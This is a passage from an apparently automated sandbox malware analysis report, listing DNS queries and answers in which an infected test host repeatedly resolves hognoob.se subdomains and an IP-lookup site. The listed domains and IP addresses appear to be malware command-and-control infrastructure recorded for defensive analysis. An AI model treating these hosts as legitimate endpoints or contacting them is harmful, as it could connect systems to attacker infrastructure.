May 16, 2019 17:16:37.098253012 CEST 50611 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:37.125576019 CEST 53 50611 8.8.8.8 192.168.2.5
May 16, 2019 17:16:38.811672926 CEST 62388 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:38.825573921 CEST 53 62388 8.8.8.8 192.168.2.5
May 16, 2019 17:16:40.479717970 CEST 59412 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:40.507721901 CEST 53 59412 8.8.8.8 192.168.2.5
May 16, 2019 17:16:42.138859034 CEST 50860 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:42.166168928 CEST 53 50860 8.8.8.8 192.168.2.5
May 16, 2019 17:16:43.855046988 CEST 57540 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:43.885386944 CEST 53 57540 8.8.8.8 192.168.2.5
May 16, 2019 17:16:45.574423075 CEST 50779 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:45.601716042 CEST 53 50779 8.8.8.8 192.168.2.5
May 16, 2019 17:16:47.304636002 CEST 51380 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:47.331859112 CEST 53 51380 8.8.8.8 192.168.2.5
May 16, 2019 17:16:48.977777004 CEST 60707 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:48.991177082 CEST 53 60707 8.8.8.8 192.168.2.5
May 16, 2019 17:16:50.642930031 CEST 49386 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:50.674896002 CEST 53 49386 8.8.8.8 192.168.2.5
May 16, 2019 17:16:54.067745924 CEST 64896 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:54.095082998 CEST 53 64896 8.8.8.8 192.168.2.5
May 16, 2019 17:16:55.747817039 CEST 55090 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:55.761073112 CEST 53 55090 8.8.8.8 192.168.2.5
May 16, 2019 17:16:57.391441107 CEST 49816 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:57.418710947 CEST 53 49816 8.8.8.8 192.168.2.5
Timestamp Source Port Dest Port Source IP Dest IP
Copyright Joe Security LLC 2019 Page 40 of 69
May 16, 2019 17:17:01.390713930 CEST 51260 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:01.417872906 CEST 53 51260 8.8.8.8 192.168.2.5
May 16, 2019 17:17:03.132452011 CEST 59500 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:03.145778894 CEST 53 59500 8.8.8.8 192.168.2.5
May 16, 2019 17:17:04.779526949 CEST 53889 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:04.793451071 CEST 53 53889 8.8.8.8 192.168.2.5
May 16, 2019 17:17:06.519885063 CEST 57689 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:06.533390999 CEST 53 57689 8.8.8.8 192.168.2.5
May 16, 2019 17:17:08.173060894 CEST 63557 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:08.200413942 CEST 53 63557 8.8.8.8 192.168.2.5
May 16, 2019 17:17:09.854626894 CEST 63582 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:09.887250900 CEST 53 63582 8.8.8.8 192.168.2.5
May 16, 2019 17:17:11.532763004 CEST 59287 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:11.546127081 CEST 53 59287 8.8.8.8 192.168.2.5
May 16, 2019 17:17:13.209136009 CEST 57502 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:13.222455025 CEST 53 57502 8.8.8.8 192.168.2.5
May 16, 2019 17:17:19.505327940 CEST 57600 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:19.532576084 CEST 53 57600 8.8.8.8 192.168.2.5
May 16, 2019 17:17:21.178663969 CEST 57426 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:21.206109047 CEST 53 57426 8.8.8.8 192.168.2.5
May 16, 2019 17:17:22.856798887 CEST 53451 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:22.870672941 CEST 53 53451 8.8.8.8 192.168.2.5
May 16, 2019 17:17:24.610611916 CEST 65030 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:24.638256073 CEST 53 65030 8.8.8.8 192.168.2.5
May 16, 2019 17:17:26.340679884 CEST 63505 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:26.354038954 CEST 53 63505 8.8.8.8 192.168.2.5
May 16, 2019 17:17:28.003288031 CEST 58579 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:28.016495943 CEST 53 58579 8.8.8.8 192.168.2.5
May 16, 2019 17:17:29.764863014 CEST 65402 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:29.792603016 CEST 53 65402 8.8.8.8 192.168.2.5
May 16, 2019 17:17:31.552505016 CEST 59046 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:31.565807104 CEST 53 59046 8.8.8.8 192.168.2.5
May 16, 2019 17:17:33.191221952 CEST 53154 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:33.221442938 CEST 53 53154 8.8.8.8 192.168.2.5
May 16, 2019 17:17:34.902124882 CEST 52283 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:34.915518999 CEST 53 52283 8.8.8.8 192.168.2.5
May 16, 2019 17:17:36.536287069 CEST 58992 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:36.564078093 CEST 53 58992 8.8.8.8 192.168.2.5
May 16, 2019 17:17:38.200508118 CEST 49985 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:38.228178024 CEST 53 49985 8.8.8.8 192.168.2.5
May 16, 2019 17:17:39.910947084 CEST 56529 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:39.924240112 CEST 53 56529 8.8.8.8 192.168.2.5
May 16, 2019 17:17:41.071813107 CEST 65334 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:41.518049955 CEST 53 65334 8.8.8.8 192.168.2.5
May 16, 2019 17:17:43.792778969 CEST 57365 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:43.828746080 CEST 53 57365 8.8.8.8 192.168.2.5
May 16, 2019 17:17:45.147485971 CEST 60056 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:45.178095102 CEST 53 60056 8.8.8.8 192.168.2.5
May 16, 2019 17:17:46.615647078 CEST 52221 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:46.642884970 CEST 53 52221 8.8.8.8 192.168.2.5
May 16, 2019 17:18:06.509629965 CEST 58454 53 192.168.2.5 8.8.8.8
May 16, 2019 17:18:06.555711985 CEST 53 58454 8.8.8.8 192.168.2.5
May 16, 2019 17:18:08.981101036 CEST 51879 53 192.168.2.5 8.8.8.8
May 16, 2019 17:18:08.994851112 CEST 53 51879 8.8.8.8 192.168.2.5
May 16, 2019 17:18:11.523444891 CEST 57390 53 192.168.2.5 8.8.8.8
May 16, 2019 17:18:11.550880909 CEST 53 57390 8.8.8.8 192.168.2.5
May 16, 2019 17:18:14.228220940 CEST 52974 53 192.168.2.5 8.8.8.8
May 16, 2019 17:18:14.258923054 CEST 53 52974 8.8.8.8 192.168.2.5
Timestamp Source Port Dest Port Source IP Dest IP
Timestamp Source IP Dest IP Trans ID OP Code Name Type Class
May 16, 2019 17:15:39.070086956 CEST 192.168.2.5 8.8.8.8 0xebbe Standard query (0)
fid.hognoob.se A (IP address) IN (0x0001)
DNS Queries
Copyright Joe Security LLC 2019 Page 41 of 69
May 16, 2019 17:15:39.144161940 CEST 192.168.2.5 8.8.8.8 0xe889 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:15:40.738154888 CEST 192.168.2.5 8.8.8.8 0x7de4 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:15:42.426970959 CEST 192.168.2.5 8.8.8.8 0xe1ee Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:15:44.085347891 CEST 192.168.2.5 8.8.8.8 0x792 Standard query (0)
fid.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:15:44.132404089 CEST 192.168.2.5 8.8.8.8 0xed86 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:15:45.823421955 CEST 192.168.2.5 8.8.8.8 0x3368 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:15:46.941581011 CEST 192.168.2.5 8.8.8.8 0x1922 Standard query (0)
fid.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:15:47.482274055 CEST 192.168.2.5 8.8.8.8 0x2a2 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:15:50.849494934 CEST 192.168.2.5 8.8.8.8 0x9832 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:15:52.489936113 CEST 192.168.2.5 8.8.8.8 0xc58f Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:15:53.103890896 CEST 192.168.2.5 8.8.8.8 0xfacb Standard query (0)
uio.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:15:53.375061035 CEST 192.168.2.5 8.8.8.8 0xbb7d Standard query (0)
upa1.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:15:53.576452971 CEST 192.168.2.5 8.8.8.8 0xbb56 Standard query (0)
upa2.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:15:54.214173079 CEST 192.168.2.5 8.8.8.8 0x6337 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:15:55.937410116 CEST 192.168.2.5 8.8.8.8 0x77e8 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:15:57.639635086 CEST 192.168.2.5 8.8.8.8 0x4ab3 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:15:59.347651005 CEST 192.168.2.5 8.8.8.8 0x6722 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:01.130189896 CEST 192.168.2.5 8.8.8.8 0x1e2 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:02.812659025 CEST 192.168.2.5 8.8.8.8 0xdfc6 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:04.547229052 CEST 192.168.2.5 8.8.8.8 0xacce Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:06.240150928 CEST 192.168.2.5 8.8.8.8 0x4b08 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:08.306943893 CEST 192.168.2.5 8.8.8.8 0xfd76 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:12.969938040 CEST 192.168.2.5 8.8.8.8 0xa3d4 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:14.651127100 CEST 192.168.2.5 8.8.8.8 0x320c Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:21.065387964 CEST 192.168.2.5 8.8.8.8 0x82d8 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:22.791235924 CEST 192.168.2.5 8.8.8.8 0xe8bb Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:24.500495911 CEST 192.168.2.5 8.8.8.8 0x9d13 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:26.195426941 CEST 192.168.2.5 8.8.8.8 0x4f04 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:31.800149918 CEST 192.168.2.5 8.8.8.8 0x546a Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:33.498259068 CEST 192.168.2.5 8.8.8.8 0x6249 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:35.433422089 CEST 192.168.2.5 8.8.8.8 0xdab1 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:37.098253012 CEST 192.168.2.5 8.8.8.8 0x4b17 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:38.811672926 CEST 192.168.2.5 8.8.8.8 0x3703 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:40.479717970 CEST 192.168.2.5 8.8.8.8 0x1e69 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:42.138859034 CEST 192.168.2.5 8.8.8.8 0x730c Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:43.855046988 CEST 192.168.2.5 8.8.8.8 0x76de Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:45.574423075 CEST 192.168.2.5 8.8.8.8 0xa505 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
Timestamp Source IP Dest IP Trans ID OP Code Name Type Class
Copyright Joe Security LLC 2019 Page 42 of 69
May 16, 2019 17:16:47.304636002 CEST 192.168.2.5 8.8.8.8 0x370f Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:48.977777004 CEST 192.168.2.5 8.8.8.8 0x7e64 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:50.642930031 CEST 192.168.2.5 8.8.8.8 0x6237 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:54.067745924 CEST 192.168.2.5 8.8.8.8 0x4143 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:55.747817039 CEST 192.168.2.5 8.8.8.8 0x7ec4 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:57.391441107 CEST 192.168.2.5 8.8.8.8 0x8f53 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:01.390713930 CEST 192.168.2.5 8.8.8.8 0x9cc8 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:03.132452011 CEST 192.168.2.5 8.8.8.8 0xed52 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:04.779526949 CEST 192.168.2.5 8.8.8.8 0xaf13 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:06.519885063 CEST 192.168.2.5 8.8.8.8 0xbcc5 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:08.173060894 CEST 192.168.2.5 8.8.8.8 0xa24b Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:09.854626894 CEST 192.168.2.5 8.8.8.8 0x66b Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:11.532763004 CEST 192.168.2.5 8.8.8.8 0x38f9 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:13.209136009 CEST 192.168.2.5 8.8.8.8 0x8f5c Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:19.505327940 CEST 192.168.2.5 8.8.8.8 0x73df Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:21.178663969 CEST 192.168.2.5 8.8.8.8 0xa074 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:22.856798887 CEST 192.168.2.5 8.8.8.8 0xe699 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:24.610611916 CEST 192.168.2.5 8.8.8.8 0x7472 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:26.340679884 CEST 192.168.2.5 8.8.8.8 0xba0b Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:28.003288031 CEST 192.168.2.5 8.8.8.8 0x36a9 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:29.764863014 CEST 192.168.2.5 8.8.8.8 0xde13 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:31.552505016 CEST 192.168.2.5 8.8.8.8 0x7d16 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:33.191221952 CEST 192.168.2.5 8.8.8.8 0x6f23 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:34.902124882 CEST 192.168.2.5 8.8.8.8 0xcf8d Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:36.536287069 CEST 192.168.2.5 8.8.8.8 0x3497 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:38.200508118 CEST 192.168.2.5 8.8.8.8 0x4326 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:39.910947084 CEST 192.168.2.5 8.8.8.8 0xe5a7 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:41.071813107 CEST 192.168.2.5 8.8.8.8 0xb48f Standard query (0)
2019.ip138.com A (IP address) IN (0x0001)
May 16, 2019 17:17:43.792778969 CEST 192.168.2.5 8.8.8.8 0xb46d Standard query (0)
pxx.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:45.147485971 CEST 192.168.2.5 8.8.8.8 0x4023 Standard query (0)
haq.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:46.615647078 CEST 192.168.2.5 8.8.8.8 0x2ca7 Standard query (0)
haq.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:18:06.509629965 CEST 192.168.2.5 8.8.8.8 0x6522 Standard query (0)
haq.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:18:08.981101036 CEST 192.168.2.5 8.8.8.8 0xddac Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:18:11.523444891 CEST 192.168.2.5 8.8.8.8 0xffac Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:18:14.228220940 CEST 192.168.2.5 8.8.8.8 0x612a Standard query (0)
haq.hognoob.se A (IP address) IN (0x0001)
Timestamp Source IP Dest IP Trans ID OP Code Name Type Class
DNS Answers
Copyright Joe Security LLC 2019 Page 43 of 69
Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class
May 16, 2019 17:15:39.110205889 CEST
8.8.8.8 192.168.2.5 0xebbe No error (0) fid.hognoob.se 45.67.14.164 A (IP address) IN (0x0001)
May 16, 2019 17:15:39.171838999 CEST
8.8.8.8 192.168.2.5 0xe889 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:15:40.765496016 CEST
8.8.8.8 192.168.2.5 0x7de4 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:15:42.460274935 CEST
8.8.8.8 192.168.2.5 0xe1ee No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:15:44.124200106 CEST
8.8.8.8 192.168.2.5 0x792 No error (0) fid.hognoob.se 45.67.14.164 A (IP address) IN (0x0001)
May 16, 2019 17:15:44.177515984 CEST
8.8.8.8 192.168.2.5 0xed86 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:15:45.850907087 CEST
8.8.8.8 192.168.2.5 0x3368 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:15:47.003392935 CEST
8.8.8.8 192.168.2.5 0x1922 No error (0) fid.hognoob.se 45.67.14.164 A (IP address) IN (0x0001)
May 16, 2019 17:15:47.510266066 CEST
8.8.8.8 192.168.2.5 0x2a2 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:15:50.876676083 CEST
8.8.8.8 192.168.2.5 0x9832 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:15:52.517611027 CEST
8.8.8.8 192.168.2.5 0xc58f No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:15:53.131223917 CEST
8.8.8.8 192.168.2.5 0xfacb No error (0) uio.hognoob.se 195.128.126.120 A (IP address) IN (0x0001)
May 16, 2019 17:15:53.403254986 CEST
8.8.8.8 192.168.2.5 0xbb7d No error (0) upa1.hognoob.se 172.104.161.101 A (IP address) IN (0x0001)
May 16, 2019 17:15:53.603751898 CEST
8.8.8.8 192.168.2.5 0xbb56 No error (0) upa2.hognoob.se 172.105.237.113 A (IP address) IN (0x0001)
May 16, 2019 17:15:54.274655104 CEST
8.8.8.8 192.168.2.5 0x6337 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:15:55.964837074 CEST
8.8.8.8 192.168.2.5 0x77e8 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:15:57.666914940 CEST
8.8.8.8 192.168.2.5 0x4ab3 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:15:59.374690056 CEST
8.8.8.8 192.168.2.5 0x6722 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:01.157440901 CEST
8.8.8.8 192.168.2.5 0x1e2 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:02.839837074 CEST
8.8.8.8 192.168.2.5 0xdfc6 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:04.574561119 CEST
8.8.8.8 192.168.2.5 0xacce No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:06.274620056 CEST
8.8.8.8 192.168.2.5 0x4b08 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:08.335238934 CEST
8.8.8.8 192.168.2.5 0xfd76 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:13.009057045 CEST
8.8.8.8 192.168.2.5 0xa3d4 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:14.664491892 CEST
8.8.8.8 192.168.2.5 0x320c No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:21.092657089 CEST
8.8.8.8 192.168.2.5 0x82d8 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
Copyright Joe Security LLC 2019 Page 44 of 69
May 16, 2019 17:16:22.818922043 CEST
8.8.8.8 192.168.2.5 0xe8bb No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:24.528129101 CEST
8.8.8.8 192.168.2.5 0x9d13 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:26.223279953 CEST
8.8.8.8 192.168.2.5 0x4f04 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:31.827606916 CEST
8.8.8.8 192.168.2.5 0x546a No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:33.529900074 CEST
8.8.8.8 192.168.2.5 0x6249 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:35.461162090 CEST
8.8.8.8 192.168.2.5 0xdab1 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:37.125576019 CEST
8.8.8.8 192.168.2.5 0x4b17 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:38.825573921 CEST
8.8.8.8 192.168.2.5 0x3703 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:40.507721901 CEST
8.8.8.8 192.168.2.5 0x1e69 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:42.166168928 CEST
8.8.8.8 192.168.2.5 0x730c No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:43.885386944 CEST
8.8.8.8 192.168.2.5 0x76de No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:45.601716042 CEST
8.8.8.8 192.168.2.5 0xa505 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:47.331859112 CEST
8.8.8.8 192.168.2.5 0x370f No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:48.991177082 CEST
8.8.8.8 192.168.2.5 0x7e64 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:50.674896002 CEST
8.8.8.8 192.168.2.5 0x6237 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:54.095082998 CEST
8.8.8.8 192.168.2.5 0x4143 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:55.761073112 CEST
8.8.8.8 192.168.2.5 0x7ec4 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:57.418710947 CEST
8.8.8.8 192.168.2.5 0x8f53 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:01.417872906 CEST
8.8.8.8 192.168.2.5 0x9cc8 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:03.145778894 CEST
8.8.8.8 192.168.2.5 0xed52 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:04.793451071 CEST
8.8.8.8 192.168.2.5 0xaf13 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:06.533390999 CEST
8.8.8.8 192.168.2.5 0xbcc5 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:08.200413942 CEST
8.8.8.8 192.168.2.5 0xa24b No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:09.887250900 CEST
8.8.8.8 192.168.2.5 0x66b No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:11.546127081 CEST
8.8.8.8 192.168.2.5 0x38f9 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:13.222455025 CEST
8.8.8.8 192.168.2.5 0x8f5c No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class
Copyright Joe Security LLC 2019 Page 45 of 69
May 16, 2019 17:17:19.532576084 CEST
8.8.8.8 192.168.2.5 0x73df No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:21.206109047 CEST
8.8.8.8 192.168.2.5 0xa074 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:22.870672941 CEST
8.8.8.8 192.168.2.5 0xe699 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:24.638256073 CEST
8.8.8.8 192.168.2.5 0x7472 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:26.354038954 CEST
8.8.8.8 192.168.2.5 0xba0b No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:28.016495943 CEST
8.8.8.8 192.168.2.5 0x36a9 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:29.792603016 CEST
8.8.8.8 192.168.2.5 0xde13 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:31.565807104 CEST
8.8.8.8 192.168.2.5 0x7d16 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:33.221442938 CEST
8.8.8.8 192.168.2.5 0x6f23 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:34.915518999 CEST
8.8.8.8 192.168.2.5 0xcf8d No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:36.564078093 CEST
8.8.8.8 192.168.2.5 0x3497 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:38.228178024 CEST
8.8.8.8 192.168.2.5 0x4326 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:39.924240112 CEST
8.8.8.8 192.168.2.5 0xe5a7 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:41.518049955 CEST
8.8.8.8 192.168.2.5 0xb48f No error (0) 2019.ip138.com 117.25.157.119 A (IP address) IN (0x0001)
May 16, 2019 17:17:43.828746080 CEST
8.8.8.8 192.168.2.5 0xb46d No error (0) pxx.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
